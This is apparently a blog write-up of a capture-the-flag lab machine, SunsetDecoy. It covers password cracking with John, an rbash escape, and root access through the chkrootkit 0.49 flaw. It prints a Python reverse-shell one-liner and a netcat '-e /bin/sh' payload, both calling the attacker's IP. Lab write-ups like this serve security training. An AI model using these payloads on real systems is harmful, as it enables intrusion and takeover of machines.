pg-sunsetdecoy-play

SunsetDecoy

Nmap
sudo nmap 192.168.184.85 -p- -sS -sV 130 
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

First up checking the root page for port 80 takes us to an index page containing a file called save.zip.

Upon downloading the file we are asked for a password to open. Kali comes pre-installed with a John module called zip2john. We can use this to create a hash of the file which can be used for cracking with John.

 
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ zip2john save.zip > hash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ ls
hash save.zip

We can then run John against the hash.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (save.zip)
1g 0:00:00:00 DONE (2021-09-09 05:12) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]

We can then extract the contents of save.zip. After doing so we extract the /etc/ folder.

Out of these files shadow is of interest the most.

We have passwords hash for the root account and the account ‘296640a3b825115a47b68fc44501c828’. I was unable to crack the root password with a wordlist so instead was able to crack the other account after  unshadow it

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy/etc]
└─$ john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0.02% (ETA: 19:25:07) 0g/s 340.4p/s 680.9c/s 680.9C/s newzealand..blue13
0g 0:00:00:20 0.04% (ETA: 19:14:39) 0g/s 343.0p/s 686.0c/s 686.0C/s bethan..bagpuss
server (296640a3b825115a47b68fc44501c828)
1g 0:00:03:08 0.63% (ETA: 13:41:37) 0.005317g/s 576.4p/s 667.0c/s 667.0C/s 222520..192522
1g 0:00:03:10 0.64% (ETA: 13:40:28) 0.005257g/s 577.3p/s 666.8c/s 666.8C/s sh3lby..sabong
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
We now have the password: server I was then able to login to SSH with the username and password.
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.187.85 -t "bash --noprofile"

296640a3b825115a47b68fc44501c828@192.168.187.85's password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$

When attempting to run a simple command such as cat we are given the error message: -rbash: cat: command not found.

We fix the $PATH with

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games"
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ cd 296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt 
5ffa884b32351d811cd1314c366c6098

Once in we have a more usable shell. We can then run a Python reverse shell to create another shell connection this should get us more usable.

/usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.49.184”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’

Once in the new shell export a new path so we have use of commands easily.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

After enumerating the machine for a while I was unable to find points of escalation. I then transferred over pspy64 and let it run.

chmod +x pspy64
./pspy64

Soon after running we get a huge amount of entries for chkrootkit-0.49.

Researching on Google shows a local privilege escalation exploit with this version and below:

Chkrootkit 0.49 – Local Privilege Escalation
Chkrootkit 0.49 – Local Privilege Escalation. CVE-2014-0476CVE-107710 . local exploit for Linux platform
www.exploit-db.com

Essentially this will execute a binary in /tmp/update. We can create update as a reverse shell and when executed should give us a root shell.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
/usr/bin/nc 192.168.49.187 4444 -e /bin/sh
Make it executable:
chmod +x /tmp/update

Then open a netcat listener to the specified port and we should land a root shell.

But Only after we start ( the file is in users’s home dir, so user has all permissions there)

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -la
total 60
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Sep 9 06:04 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp


296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$

.

┌──(kali㉿puckie)-[~/offsec]
└─$ sudo nc -nlvp 4444 
listening on [any] 4444 ...
connect to [192.168.49.187] from (UNKNOWN) [192.168.187.85] 35942
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 36
drwx------ 3 root root 4096 Sep 9 05:07 .
drwxr-xr-x 18 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Sep 9 05:08 proof.txt
-rw-r--r-- 1 root root 32 Aug 27 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020 script.sh
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
cat proof.txt
80a4a1e86a9094a469a78902c269d6bb
cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi

.
Explained:
pwd
/var/spool/cron/crontabs
cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.V4fwaR/crontab installed on Tue Jul 7 16:44:59 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
--snip--
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h dom mon dow command
* * * * * /bin/bash /root/script.sh
.
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *